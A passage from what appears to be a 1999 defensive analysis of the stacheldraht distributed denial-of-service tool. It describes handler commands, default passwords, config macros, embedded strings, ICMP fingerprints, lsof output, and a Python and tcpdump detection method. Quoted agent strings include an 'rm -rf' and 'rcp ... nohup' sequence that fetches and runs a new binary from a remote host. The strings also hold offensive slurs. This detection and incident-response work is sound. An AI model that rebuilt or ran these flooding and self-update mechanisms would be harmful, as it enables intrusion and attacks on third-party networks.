      The Makefiles contain rules for Linux and Solaris, with the default
      being Linux (even though it appears that the code does not work
      very reliably on Linux).  For the purposes of this analysis, all
      programs were compiled and run on Red Hat Linux 6.0 systems.  As far
      as I am aware, the agent has been witnessed "in the wild" only on
      Solaris 2.x systems.
      
      One thing that may not have been clearly stated in the analyses done
      on trinoo and Tribe Flood Network is that distributed denial of
      service attacks are two phase attacks, with "victims" and "attackers"
      that are defined depending on your point of view.
      
      There is an initial mass-intrusion phase, in which automated tools are
      used to remotely root compromise large numbers of systems (i.e., in the
      several hundred to several thousand range), and the distributed denial
      of service agents are installed on these compromised systems.  These are
      primary victims (of system compromise.)  None of these distributed
      denial of service tools have any features that facilitate compromising
      systems, and these automated tools are held closely by those groups
      who wrote them.
      
      The mass-intrusion phase is followed by the actual denial of service
      attack phase, in which these compromised systems which constitute the
      handlers and agents of the distributed attack network are used to wage
      massive denial of service attacks against one or more sites.  These
      are secondary victims (of denial of service).
      
      [For a description of the methods used in the initial intrusion and
      network setup phases, see the analysis of the trinoo network,
      referenced in Appendix A.]
      
      Remember that modification of the source code can and would change any
      of the details of this analysis, such as prompts, passwords, commands,
      TCP/UDP port numbers, or supported attack methods, signatures, and
      features.
      
      
      The network: client(s)-->handler(s)-->agent(s)-->victim(s)
      ------------------------------------------------------------
      
      The stacheldraht network is made up of one or more handler programs
      ("mserv.c") and a large set of agents ("leaf/td.c").  The attacker uses
      an encrypting "telnet alike" program to connect to and communicate
      with the handlers ("telnetc/client.c").  A stacheldraht network would
      look like this:
      
                         +--------+             +--------+
                         | client |             | client |
                         +--------+             +--------+
                             |                      |
              . . . --+------+---------------+------+----------------+-- . . .
                      |                      |                       |
                      |                      |                       |
                +-----------+          +-----------+           +-----------+
                |  handler  |          |  handler  |           |  handler  |
                +-----------+          +-----------+           +-----------+
                      |                      |                       |
                      |                      |                       |
      . . . ---+------+-----+------------+---+--------+------------+-+-- . . .
               |            |            |            |            |
               |            |            |            |            |
           +-------+    +-------+    +-------+    +-------+    +-------+
           | agent |    | agent |    | agent |    | agent |    | agent |
           +-------+    +-------+    +-------+    +-------+    +-------+
      
      
      The attacker(s) control one or more handlers using encrypting clients.
      Each handler can control many agents.  (There is an internal limit in
      the "mserv.c" code to 1000 agents. It is not known why 1000 was chosen,
      but the code does say that "1000 sockets are leet0.")  The agents are
      all instructed to coordinate a packet based attack against one or more
      victim systems by the handler (referred to as an "mserver" or "master
      server" in the code.)
      
      
      Communication
      -------------
      
          Client to handler(s):       16660/tcp
          Handler to/from agent(s):   65000/tcp, ICMP ECHO_REPLY
      
      Unlike trinoo, which uses UDP for communication between handlers and
      agents, or the original Tribe Flood Network, which uses ICMP for
      communication between the handler and agents, stacheldraht uses TCP
      and ICMP.
      
      Remote control of a stacheldraht network is accomplished using a
      simple client that uses symmetric key encryption for communication
      between itself and the handler.  The client accepts a single argument,
      the address of the handler to which it should connect.  It then
      connects using a TCP port (default 16660/tcp in the analyzed code).
      
      The attacker sees the following (if the proper password is given):
      
      ---------------------------------------------------------------------------
      # ./client 192.168.0.1
          [*] stacheldraht [*]
       (c) in 1999 by ...
      
      trying to connect...
      connection established.
      --------------------------------------
      enter the passphrase : sicken
      --------------------------------------
      entering interactive session.
      ******************************
         welcome to stacheldraht
      ******************************
      type .help if you are lame
      
      stacheldraht(status: a!1 d!0)>
      ---------------------------------------------------------------------------
      
      The prompt shows the number of agents that are believed to be active
      ("a!") and dead ("d!") at the time.  Using the command ".help" (let's
      assume, for the sake of argument, that we are lame) shows the
      supported command set:
      
      ---------------------------------------------------------------------------
      stacheldraht(status: a!1 d!0)>.help
      available commands in this version are:
      --------------------------------------------------
      .mtimer   .mudp     .micmp .msyn    .msort  .mping
      .madd     .mlist    .msadd .msrem   .distro .help
      .setusize .setisize .mdie  .sprange .mstop  .killall
      .showdead .showalive
      --------------------------------------------------
      stacheldraht(status: a!1 d!0)>
      ---------------------------------------------------------------------------
      
      
      Commands
      --------
      
      .distro user server
              Instructs the agent to install and run a new copy of itself
              using the Berkeley "rcp" command, on the system "server",
              using the account "user" (e.g., "rcp user@server:linux.bin ttymon")
      
      .help
              Prints a list of supported commands.
      
      .killall
              Kills all active agents.
      
      .madd ip1[:ip2[:ipN]]
              Add IP addresses to list of attack victims.
      
      .mdie
              Sends die request to all agents.
      
      .mdos
              Begins DoS attack.
      
      .micmp ip1[:ip2[:ipN]]
              Begin ICMP flood attack against specified hosts.
      
      .mlist
              List IP addresses of hosts being DoS attacked at the moment.
      
      .mping
              Pings all agents (bcasts) to see if they are alive.
      
      .msadd
              Adds a new master server (handler) to the list of available
              servers.
      
      .msort
              Sort out dead/alive agents (bcasts). (Sends pings and
              shows counts/percentage of dead/alive agents).
      
      .mstop ip1[:ip2[:ipN]]
      .mstop all
              Stop attacking specific IP addresses, or all.
      
      .msrem
              Removes a master server (handler) from the list of available
              servers.
      
      .msyn ip1[:ip2[:ipN]]
              Begin SYN flood attack against specified hosts.
      
      .mtimer seconds
              Set timer for attack duration. (No checks on this value.)
      
      .mudp ip1[:ip2[:ipN]]
              Begin UDP flood attack against specified hosts.
              (Trinoo DoS emulation mode.)
      
      .setisize
              Sets size of ICMP packets for flooding. (max:1024,
              default:1024).
      
      .setusize
              Sets size of UDP packets for flooding (max:1024,
              default:1024).
      
      .showalive
              Shows all "alive" agents (bcasts).
      
      .showdead
              Shows all "dead" agents (bcasts).
      
      .sprange lowport-highport
              Sets the range of ports for SYN flooding (defaults to
              lowport:0, highport:140).
      
      
      Password protection
      -------------------
      
      After connecting to the handler using the client program, the attacker
      is prompted for a password.  This password (default "sicken" in the
      analyzed code) is a standard crypt() encrypted password, which is then
      Blowfish encrypted using the passphrase "authentication" before being
      sent over the network to the handler (*all* communication between
      the agent and handler is Blowfish encrypted with this passphrase.)
      
      Like TFN, C macros ("config.h") define values used for expressing
      commands, replacement argument vectors ("HIDEME" and "HIDEKIDS")
      to conceal program names, etc.:
      
      ---------------------------------------------------------------------------
      #ifndef _CONFIG_H
      
      /* user defined values for the teletubby flood network */
      
      #define HIDEME "(kswapd)"
      #define HIDEKIDS "httpd"
      #define CHILDS 10
      
      /* These are like passwords, you might want to change them */
      
      #define ID_SHELL   1    /* to bind a rootshell */
      
      #define ID_ADDR  699     /* ip add request for the flood server */
      
      #define  ID_SETPRANGE 2007 /* set port range for synflood */
      #define   ID_SETUSIZE 2006 /* set udp size */
      #define   ID_SETISIZE 2005 /* set icmp size */
      #define    ID_TIMESET 2004 /* set the flood time */
      #define     ID_DIEREQ 2003 /* shutdown request of the masterserver */
      #define   ID_DISTROIT 2002 /* distro request of the master server */
      #define ID_REMMSERVER 2001 /* remove added masterserver */
      #define ID_ADDMSERVER 2000 /* add new masterserver request */
      #define SPOOF_REPLY 1000   /* spoof test reply of the master server
      #define ID_TEST  668       /* test of the master server */
      #define ID_ICMP  1055      /* to icmp flood */
      #define ID_SENDUDP 2       /* to udp flood */
      #define ID_SENDSYN 3       /* to syn flood */
      #define ID_SYNPORT 4       /* to set port */
      #define ID_STOPIT  5       /* to stop flooding */
      #define ID_SWITCH  6       /* to switch spoofing mode */
      #define ID_ACK     7       /* for replies to the client */
      
      #define _CONFIG_H
      #endif
      ---------------------------------------------------------------------------
      
      As you can see, it is recommended that these be changed to prevent
      someone stumbling across the agents from knowing what values are
      used, thereby allowing them to execute agent commands.
      
      
      Fingerprints
      ------------
      
      As with trinoo and Tribe Flood Network, the methods used to install
      the handler/agent will be the same as installing any program on a
      compromised Unix system, with all the standard options for concealing
      the programs and files (e.g., use of hidden directories, "root kits",
      kernel modules, etc.)
      
      One feature of stacheldraht not shared by trinoo or TFN is the ability
      to upgrade the agents on demand.  This feature employs the Berkeley
      "rcp" command (514/tcp), using a stolen account at some site as a
      cache.  On demand, all agents are instructed to delete the current
      program image, go out and get a new copy (either Linux- or
      Solaris-specific binary) from a site/account using "rcp", start running
      this new image with "nohup", and then exit.
      
      As for identifying the programs in the file system, there are
      (provided they are not edited out) some discernible strings.
      
      Strings embedded in the encrypting client ("client") include the
      following:
      
      ------------------------------------------------------------------------------
       . . .
      connection closed.
      usage: ./sclient <ip/host>
          [*] stacheldraht [*]
       (c) in 1999 by ...
      trying to connect...
      unable to resolv %s
      unable to connect.
      connection established.
      --------------------------------------
      enter the passphrase :
      authentication
      failed
      authentication failed.
      entering interactive session.
      ./0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ
      huhu
       . . .
      ------------------------------------------------------------------------------
      
      Strings embedded in the handler ("mserv") include the following:
      
      ------------------------------------------------------------------------------
       . . .
      %d.%d.%d.%d
      jbQ4yQaKLbFZc
      * mtimer reached *
      .quit
      exiting...
      you need to stop the packet action first.
      .help
      .version
      [*]stacheldraht[*] mserver version: 1.1
      setusize
      setisize
      mdos
      mping
      mudp
      micmp
      msyn
      mstop
      mtimer
      madd
      mlist
      msort
      msadd
      msrem
      distro
      sprange
      killall
      showdead
      showalive
      add some bcasts mofo.
      killing all active childs...
      usage: .sprange <lowport-highport>
      example: .sprange 0-140
       low port is : %i
      high port is : %i
      request was sent to the network.
      usage: .setusize <udp packet size (<=1024)>
      current udp packet size is %ibytes
      udp packet size was set to %i bytes.
      udp packet size is too large.
      usage: .setisize <icmp packet size (<=1024)>
      current icmp packet size is %ibytes
      icmp packet size was set to %i bytes.
      icmp packet size is too large.
      sending mass die request...
      finished.
      .mudp
      starting trinoo emulation...
      removing useful commands.
      - DONE -
      available commands in this version are:
      --------------------------------------------------
      .mtimer   .mudp     .micmp .msyn    .msort  .mping
      .madd     .mlist    .msadd .msrem   .distro .help
      .setusize .setisize .mdie  .sprange .mstop  .killall
      .showdead .showalive
      usage: .distro <user> <server that runs rcp>
      remember  : the distro files need to be executable!
      that means: chmod +x linux.bin , chmod +x sol.bin ;))
      sending distro request to all bcasts....
            user : %s
      rcp server :
      unable to resolve - %s
      unable to send distro request.
      request was sent, wait some minutes ;)
      usage: .msrem <masterserver>
      removing masterserver -
      failed.
      usage: .msadd <masterserver>
      adding masterserver -
      no packet action at the moment, sir.
      the followings ip(s) are getting packeted...
      --------------------------------------------
      [*] stacheldraht [*] is packeting %d ips
      [*] stacheldraht [*] is packeting 1 ip
      .mstop all
      deleting from packetlist...
      %s - removed.
      %s - skipped.
      restarting packeting routines...
      niggahbitch
      usage: .madd <ip1:ip2:ip3:ip4>
      adding to packetlist...
      %s - added.
      usage: .mtimer <seconds to packet>
      packet timer was set to %d seconds
      usage: .mstop <all> or <ip1:ip2:ip3:ip4:ip5 etc..>
      packeting stopped.
      usage: .msyn <ip1:ip2:ip3:ip4:ip5 etc..>
      the net is already packeting.
      mass syn flooding
      %i floodrequests were sent to %i bcasts.
      usage: .micmp <ip1:ip2:ip3:ip4:ip5 etc..>
      mass icmp bombing
      usage: .mudp <ip1:ip2:ip3:ip4:ip5 etc..>
      mass udp bombing
      tR1n00(status: a!%i d!%i)>
      stacheldraht(status: a!%i d!%i)>
      waiting for ping replies...
      total bcasts : %d   - 100%
      alive bcasts : 0   - 0%
      alive bcasts : %d   -  %d%
      dead bcasts  : %d   - %d%
      showing the alive bcasts...
      ---------------------------
      alive bcasts: %i
      showing the dead bcasts...
      --------------------------
      dead bcasts: %i
      sorting out all the dead bcasts
      -------------------------------
      %d dead bcasts were sorted out.
      bcasts
      [*]-stacheldraht-[*] - forking in the background...
      %i bcasts were successfully read in.
      3.3.3.3
      spoofworks
      ficken
      authentication
      failed
      ******************************
         welcome to stacheldraht
      type .help if you are lame
      ./0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ
      huhu
      [0;35mTribe Flood Network (c) 1999 by
      [5mMixter
       . . .
      ------------------------------------------------------------------------------
      
      Strings embedded in the agent ("td") include the following:
      
      ------------------------------------------------------------------------------
       . . .
      %d.%d.%d.%d
      ICMP
      Error sending syn packet.
      tc: unknown host
      3.3.3.3
      mservers
      randomsucks
      skillz
      ttymon
      rm -rf %s
      rcp %s@%s:linux.bin %s
      nohup ./%s
      1.1.1.1
      127.0.0.1
      lpsched
      no masterserver config found.
      using default ones.
      available servers: %i - working servers : 0
      [*] stacheldraht [*] installation failed.
      found a working [*] stacheldraht [*] masterserver.
      masterserver is gone, looking for a new one
      sicken
      in.telne
      ./0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ
       . . .
      ------------------------------------------------------------------------------
      
      When each agent starts up, it attempts to read a master server
      configuration file to learn which handler(s) may control it.  This
      file is a list of IP addresses, encrypted using Blowfish, with
      a passphrase of "randomsucks". Failing to find a configuration file,
      there are one or more default handler IP addresses compiled into the
      program (shown above as "1.1.1.1" and "127.0.0.1" - these will
      obviously be changed).
      
      Once the agent has determined a list of potential handlers, it then
      starts at the beginning of the list of handlers and sends an ICMP
      ECHO_REPLY packet with an ID field containing the value 666 and data
      field containing the string "skillz".  If the master gets this packet,
      it sends back an ECHO_REPLY packet with an ID field containing the
      value 667 and data field containing the string "ficken".  (It should
      be noted that there appears to be a bug that makes the handler and
      agent send out some large, e.g., >1000 byte, packets.  The handler and
      agent continue periodically sending these 666|skillz / 667|ficken
      packets back and forth.  This would be one way of detecting agents/masters
      by passively monitoring these ICMP packets.)
      
      Seen with "sniffit" (modified per patches in the TFN analysis),
      these packets look like this:
      
      ------------------------------------------------------------------------------
      ICMP message id: 10.0.0.1 > 192.168.0.1
        ICMP type: Echo reply
       45 E 00 . 04 . 14 . 01 . 0F . 00 . 00 . 40 @ 01 . E9 . 53 S 0A . 00 . 00 . 01 .
       C0 . A6 . 00 . 01 . 00 . 00 . B4 . 13 . 02 . 9A . 00 . 00 . 00 . 00 . 00 . 00 .
       00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 .
       73 s 6B k 69 i 6C l 6C l 7A z 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 .
       00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 .
       . . . [60 lines of zeros deleted]
       00 . 00 . 00 . 00 .
      
      ICMP message id: 192.168.0.1 > 10.0.0.1
        ICMP type: Echo reply
       45 E 00 . 04 . 14 . 04 . F8 . 00 . 00 . 40 @ 01 . E5 . 6A j C0 . A6 . 00 . 01 .
       0A . 00 . 00 . 01 . 00 . 00 . CE . 21 ! 02 . 9B . 00 . 00 . 00 . 00 . 00 . 00 .
       00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 .
       66 f 69 i 63 c 6B k 65 e 6E n 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 .
       00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 . 00 .
       . . . [60 lines of zeros deleted]
       00 . 00 . 00 . 00 .
      ------------------------------------------------------------------------------
      
      In addition to finding an active handler, the agent performs a test
      to see if the network on which the agent is running allows packets to
      exit with forged source addresses.  It does this by sending out an
      ICMP ECHO_REPLY packet with a forged IP address of "3.3.3.3", an ID of
      666, and the IP address of the agent system (obtained by getting the
      hostname, then resolving this to an IP address) in the data field of
      the ICMP packet.  (Note that it also sets the Type of Service field to
      7 on this particular packet, while others have a ToS value of 0.)
      
      If the master receives this packet, it replies to the IP address
      embedded in the packet with an ECHO_REPLY packet containing an ID of
      1000 and the word "spoofworks" in the data field.  If the agent
      receives this packet, it sets a spoof_level of 0 (can spoof all 32
      bits of IP address).  If it times out before receiving a spoof reply
      packet, it sets a spoof_level of 3 (can only spoof the final octet).
      
      These packets (as seen by tcpdump and tcpshow) are shown here:
      
      ------------------------------------------------------------------------------
      # tcpdump icmp
       . . .
      14:15:35.151061 3.3.3.3 > 192.168.0.1: icmp: echo request [tos 0x7]
      14:15:35.177216 192.168.0.1 > 10.0.0.1: icmp: echo reply
       . . .
      
      # tcpdump -lenx icmp | tcpshow -cooked
       . . .
      -----------------------------------------------------------------
      Packet 5
              Timestamp:                      14:08:04.171310
              Source Ethernet Address:        00:10:1B:2B:3B:85
              Destination Ethernet Address:   00:00:F0:00:69:78
              Encapsulated Protocol:          IP
      IP Header
              Version:                        4
              Header Length:                  20 bytes
              Service Type:                   0x07
              Datagram Length:                112 bytes
              Identification:                 0x021C
              Flags:                          MF=off, DF=off
              Fragment Offset:                0
              TTL:                            255
              Encapsulated Protocol:          ICMP
              Header Checksum:                0x8408
              Source IP Address:              3.3.3.3
              Destination IP Address:         192.168.0.1
      ICMP Header
              Type:                           echo-request
              Checksum:                       0xF7FF
              Id:                             0x0000
              Sequence:                       0x0000
      ICMP Data
              ....................10.0.0.1.........................................
      .........
              <*** Rest of data missing from packet dump ***>
      
      Packet 7
              Timestamp:                      14:08:04.197954
              Source Ethernet Address:        00:00:C0:B6:84:E4
              Destination Ethernet Address:   00:00:F0:00:69:78
              Encapsulated Protocol:          IP
      IP Header
              Version:                        4
              Header Length:                  20 bytes
              Service Type:                   0x00
              Datagram Length:                1044 bytes
              Identification:                 0x198F
              Flags:                          MF=off, DF=off
              Fragment Offset:                0
              TTL:                            64
              Encapsulated Protocol:          ICMP
              Header Checksum:                0x3022
              Source IP Address:              192.168.0.1
              Destination IP Address:         10.0.0.1
      ICMP Header
              Type:                           echo-reply
              Checksum:                       0xD7DA
              Id:                             0x03E8
              Sequence:                       0x0000
      ICMP Data
              ....................spoofworks......................................
      ............................................................................
      ............................................................................
      ............................................................................
      ............................................................................
      ............................................................................
      ............................................................................
      ............................................................................
      ............................................................................
      ............................................................................
      ............................................................................
      ............................................................................
      ............................................................................
      ....................................
              <*** Rest of data missing from packet dump ***>
      ------------------------------------------------------------------------------
      
      There is also code to perform an ID test, sending an ICMP ECHO_REPLY
      packet with an ID field value of 669, and the string "sicken\n" in the
      data field.  This code is triggered if the handler is sent an ICMP
      ECHO_REPLY packet with an ID field containing the value 668.  The
      program "gag" (see Appendix A) will allow you to probe for
      stacheldraht agents, which will show up like this (tcpdump and tcpshow
      as modified per patches in Appendix C):
      
      ------------------------------------------------------------------------------
      Packet 1
              Timestamp:                      16:27:51.294727
              Source Ethernet Address:        00:00:C0:B6:84:E4
              Destination Ethernet Address:   00:00:F0:00:69:78
              Encapsulated Protocol:          IP
      IP Header
              Version:                        4
              Header Length:                  20 bytes
              Service Type:                   0x10
              Datagram Length:                40 bytes
              Identification:                 0x3558 (13656)
              Flags:                          MF=off, DF=on
              Fragment Offset:                0
              TTL:                            64
              Encapsulated Protocol:          ICMP
              Header Checksum:                0xA644
              Source IP Address:              10.0.0.2
              Destination IP Address:         198.168.0.1
      ICMP Header
              Type:                           echo-reply
              Checksum:                       0xC61F
              Id:                             0x029C (668)
              Sequence:                       0x0000 (0)
      ICMP Data
              gesundheit!....
      -----------------------------------------------------------------
      Packet 2
              Timestamp:                      16:27:51.340321
              Source Ethernet Address:        00:10:1B:2B:3B:85
              Destination Ethernet Address:   00:00:F0:00:69:78
              Encapsulated Protocol:          IP
      IP Header
              Version:                        4
              Header Length:                  20 bytes
              Service Type:                   0x00
              Datagram Length:                1044 bytes
              Identification:                 0x1D13 (7443)
              Flags:                          MF=off, DF=off
              Fragment Offset:                0
              TTL:                            64
              Encapsulated Protocol:          ICMP
              Header Checksum:                0xFAA7
              Source IP Address:              192.168.0.1
              Destination IP Address:         10.0.0.2
      ICMP Header
              Type:                           echo-reply
              Checksum:                       0xB71F
              Id:                             0x029D (669)
              Sequence:                       0x0000 (0)
      ICMP Data
              ....................sicken
              ..................................................................
      ..........................................................................
      ..........................................................................
      ..........................................................................
      ..........................................................................
      ..........................................................................
      ..........................................................................
      ..........................................................................
      ..........................................................................
      ..........................................................................
      ..........................................................................
      ..........................................................................
      ..........................................................................
      ...................................
              <*** Rest of data missing from packet dump ***>
      ------------------------------------------------------------------------------
      
      The script "gag" would be used like this.  First, build a list of all
      suspect systems (e.g., do an "nmap" OS detection scan and find all
      Solaris and Linux systems on your network, or just scan the entire
      network and find all active IP addresses).  Start "tcpdump" to capture
      all the potential replies for later use.  Then start "gag", passing it
      this list of IP addresses to check.
      
      ------------------------------------------------------------------------------
      # tcpdump -s 1500 -w stach.dump 'icmp[4:2] = 669'
      # ./gag -v iplist
      sending packet [668/"gesundheit!"] to 192.168.0.1
      sending packet [668/"gesundheit!"] to 192.168.0.30
      sending packet [668/"gesundheit!"] to 192.168.1.2
      sending packet [668/"gesundheit!"] to 192.168.1.5
      sending packet [668/"gesundheit!"] to 192.168.2.10
      sending packet [668/"gesundheit!"] to 192.168.3.6
       . . .
      ------------------------------------------------------------------------------
      
      To see the list of systems that returned ICMP ECHO_REPLY packets with
      ID 669, do the following:
      
      ------------------------------------------------------------------------------
      # tcpdump -r stach.dump
      tcpdump: Filtering in user process
      15:27:57.520094 192.168.0.1 > 10.0.0.1: icmp: echo reply (DF)
      15:28:01.984660 192.168.2.10 > 10.0.0.1: icmp: echo reply (DF)
      ------------------------------------------------------------------------------
      
      To actually see the packet contents to confirm "sicken\n" is included,
      you can do the following:
      
      ------------------------------------------------------------------------------
      # tcpshow < stach.dump | egrep "Source IP|sicken"
      tcpdump: Filtering in user process
              Source IP Address:              198.162.0.1
              ....................sicken
              Source IP Address:              192.168.2.10
              ....................sicken
      ------------------------------------------------------------------------------
      
      [There are more elegant ways of doing this, like writing a robust and
      feature filled C program with libnet (see Appendix B for reference),
      but there wasn't enough time before Y2K eve to get elegant.  What the
      heck.  Dirty works fine for me. I found three agents when I ran it
      "live."]
      
      The strings "skillz", "spoofworks", "sicken", "niggahbitch", and
      "ficken" -- all sent in ICMP data segments -- are not encrypted, so
      are visible in the data portion of ICMP ECHO_REPLY packets.  The ID
      values 666, 667, 668, 669, and 1000 would also be identifiable in the
      packet flow using the above methods.
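
      The ICMP fingerprints above can be checked mechanically.  The Python
      below is an added example, not part of the original analysis or of any
      tool it names: it classifies raw IPv4 packets against the default ID
      values and cleartext strings reported above.  The function names, the
      confidence labels and the sample packets are constructed for
      illustration, and it assumes a sensor that sees outbound traffic.

```python
import socket
import struct

ICMP_PROTO = 1
ICMP_ECHOREPLY = 0
SPOOF_TEST_SRC = "3.3.3.3"

# ICMP ID -> (cleartext marker expected in the data field, meaning).
# These are the defaults reported in the analysis; a rebuilt agent may differ.
DEFAULT_SIGNALS = {
    666: (b"skillz", "agent heartbeat to handler"),
    667: (b"ficken", "handler heartbeat reply"),
    668: (None, "ID test probe"),
    669: (b"sicken\n", "agent answer to ID test"),
    1000: (b"spoofworks", "handler answer to spoof test"),
}
MARKERS = [m for m, _ in DEFAULT_SIGNALS.values() if m]


def classify(packet):
    """Return [(confidence, reason), ...] for one raw IPv4 packet."""
    if len(packet) < 20 or packet[0] >> 4 != 4:
        return []
    ihl = (packet[0] & 0x0F) * 4
    if ihl < 20 or packet[9] != ICMP_PROTO or len(packet) < ihl + 8:
        return []
    src = socket.inet_ntoa(packet[12:16])
    icmp_type, _, _, icmp_id, _ = struct.unpack("!BBHHH", packet[ihl:ihl + 8])
    data = packet[ihl + 8:]
    findings = []

    # The spoof test is keyed on the source address alone: the capture in
    # the text shows it as an echo request with ID 0, not a reply with 666.
    if src == SPOOF_TEST_SRC:
        tos_note = " with ToS 7" if packet[1] == 7 else ""
        findings.append(("high", "spoof test source 3.3.3.3" + tos_note))

    if icmp_type != ICMP_ECHOREPLY:
        return findings

    if icmp_id in DEFAULT_SIGNALS:
        marker, meaning = DEFAULT_SIGNALS[icmp_id]
        if marker and marker in data:
            findings.append(("high", f"ID {icmp_id} + {marker!r}: {meaning}"))
        else:
            # ping picks arbitrary IDs, so an ID match alone is weak evidence
            findings.append(("low", f"ID {icmp_id} only: possible {meaning}"))
    else:
        # Command values changed in config.h but the strings left in place
        for marker in MARKERS:
            if marker in data:
                findings.append(
                    ("medium", f"{marker!r} with non-default ID {icmp_id}"))
                break
    return findings


def sample_packet(src, dst, icmp_type, icmp_id, text, tos=0):
    """Constructed test input: IPv4 + ICMP with `text` at data offset 20,
    as in the dumps in the text. Checksums are left zero (not checked here)."""
    data = b"\x00" * 20 + text
    icmp = struct.pack("!BBHHH", icmp_type, 0, 0, icmp_id, 0) + data
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, tos, 20 + len(icmp), 0, 0, 64,
                     ICMP_PROTO, 0,
                     socket.inet_aton(src), socket.inet_aton(dst))
    return ip + icmp


# Constructed samples, using the sanitized addresses from the text.
SAMPLES = {
    "heartbeat": sample_packet("10.0.0.1", "192.168.0.1", 0, 666, b"skillz"),
    "heartbeat_reply": sample_packet("192.168.0.1", "10.0.0.1", 0, 667, b"ficken"),
    "id_test_answer": sample_packet("192.168.0.1", "10.0.0.2", 0, 669, b"sicken\n"),
    "spoof_test": sample_packet("3.3.3.3", "192.168.0.1", 8, 0, b"10.0.0.1", tos=7),
    "renumbered": sample_packet("10.0.0.1", "192.168.0.1", 0, 4242, b"skillz"),
    "ping_id_collision": sample_packet("192.168.0.9", "10.0.0.9", 0, 666,
                                       b"abcdefghijklmnop"),
    "plain_ping": sample_packet("192.168.0.9", "10.0.0.9", 0, 1234,
                                b"abcdefghijklmnop"),
}


def scan(samples):
    """Map each named sample to the confidence labels it produced."""
    return {name: [c for c, _ in classify(p)] for name, p in samples.items()}


if __name__ == "__main__":
    for name, pkt in SAMPLES.items():
        print(f"{name:18} {classify(pkt)}")
```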
      
      The stacheldraht handler, which forks to handle commands and listen
      for ICMP packets, is seen on the system with "lsof" like this:
      
      ------------------------------------------------------------------------------
      # lsof -c mserv
      COMMAND  PID USER   FD   TYPE DEVICE    SIZE  NODE NAME
      mserv   1072 root  cwd    DIR    3,3    2048 40961 /tmp/...
      mserv   1072 root  rtd    DIR    3,3    1024     2 /
      mserv   1072 root  txt    REG    3,3   50506 41421 /tmp/.../mserv
      mserv   1072 root  mem    REG    3,3  342206 30722 /lib/ld-2.1.1.so
      mserv   1072 root  mem    REG    3,3   63878 30731 /lib/libcrypt-2.1.1.so
      mserv   1072 root  mem    REG    3,3 4016683 30729 /lib/libc-2.1.1.so
      mserv   1072 root    0u   CHR  136,4             6 /dev/pts/4
      mserv   1072 root    1u   CHR  136,4             6 /dev/pts/4
      mserv   1072 root    2u   CHR  136,4             6 /dev/pts/4
      mserv   1072 root    3u  sock    0,0          2143 can't identify protocol
      mserv   1073 root  cwd    DIR    3,3    2048 40961 /tmp/...
      mserv   1073 root  rtd    DIR    3,3    1024     2 /
      mserv   1073 root  txt    REG    3,3   50506 41421 /tmp/.../mserv
      mserv   1073 root  mem    REG    3,3  342206 30722 /lib/ld-2.1.1.so
      mserv   1073 root  mem    REG    3,3   63878 30731 /lib/libcrypt-2.1.1.so
      mserv   1073 root  mem    REG    3,3 4016683 30729 /lib/libc-2.1.1.so
      mserv   1073 root    0u   CHR  136,4             6 /dev/pts/4
      mserv   1073 root    1u   CHR  136,4             6 /dev/pts/4
      mserv   1073 root    2u   CHR  136,4             6 /dev/pts/4
      mserv   1073 root    3u  inet   2144           TCP *:16660 (LISTEN)
      mserv   1088 root  cwd    DIR    3,3    2048 40961 /tmp/...
      mserv   1088 root  rtd    DIR    3,3    1024     2 /
      mserv   1088 root  txt    REG    3,3   50506 41421 /tmp/.../mserv
      mserv   1088 root  mem    REG    3,3  342206 30722 /lib/ld-2.1.1.so
      mserv   1088 root  mem    REG    3,3   63878 30731 /lib/libcrypt-2.1.1.so
      mserv   1088 root  mem    REG    3,3 4016683 30729 /lib/libc-2.1.1.so
      mserv   1088 root    0u   CHR  136,4             6 /dev/pts/4
      mserv   1088 root    1u   CHR  136,4             6 /dev/pts/4
      mserv   1088 root    2u   CHR  136,4             6 /dev/pts/4
      mserv   1088 root    3r  FIFO    0,0          2227 pipe
      mserv   1088 root    5w  FIFO    0,0          2227 pipe
      mserv   1091 root  cwd    DIR    3,3    2048 40961 /tmp/...
      mserv   1091 root  rtd    DIR    3,3    1024     2 /
      mserv   1091 root  txt    REG    3,3   50506 41421 /tmp/.../mserv
      mserv   1091 root  mem    REG    3,3  342206 30722 /lib/ld-2.1.1.so
      mserv   1091 root  mem    REG    3,3   63878 30731 /lib/libcrypt-2.1.1.so
      mserv   1091 root  mem    REG    3,3 4016683 30729 /lib/libc-2.1.1.so
      mserv   1091 root    0u   CHR  136,4             6 /dev/pts/4
      mserv   1091 root    1u   CHR  136,4             6 /dev/pts/4
      mserv   1091 root    2u   CHR  136,4             6 /dev/pts/4
      mserv   1091 root    3r  FIFO    0,0          2240 pipe
      mserv   1091 root    4u  inet   2215           TCP 192.168.0.1:16660->10.0.0.1:1029 (ESTABLISHED)
      mserv   1091 root    5w  FIFO    0,0          2240 pipe
      ------------------------------------------------------------------------------
      
      The agent, which also forks when in use, looks like this:
      
      ------------------------------------------------------------------------------
      # lsof -c ttymon
      COMMAND PID USER   FD   TYPE DEVICE    SIZE  NODE NAME
      ttymon  437 root  cwd    DIR    3,1    1024 37208 /usr/lib/libx/...
      ttymon  437 root  rtd    DIR    3,1    1024     2 /
      ttymon  437 root  txt    REG    3,1  324436 37112 /usr/lib/libx/.../ttymon
      ttymon  437 root  mem    REG    3,1  243964 29140 /lib/libnss_files-2.1.1.so
      ttymon  437 root  mem    REG    3,1 4016683 29115 /lib/libc-2.1.1.so
      ttymon  437 root  mem    REG    3,1  342206 28976 /lib/ld-2.1.1.so
      ttymon  437 root    3u  sock    0,0           779 can't identify protocol
      ttymon  449 root  cwd    DIR    3,1    1024 37208 /usr/lib/libx/...
      ttymon  449 root  rtd    DIR    3,1    1024     2 /
      ttymon  449 root  txt    REG    3,1  324436 37112 /usr/lib/libx/.../ttymon
      ttymon  449 root    0u  inet    811           TCP *:32222 (LISTEN)
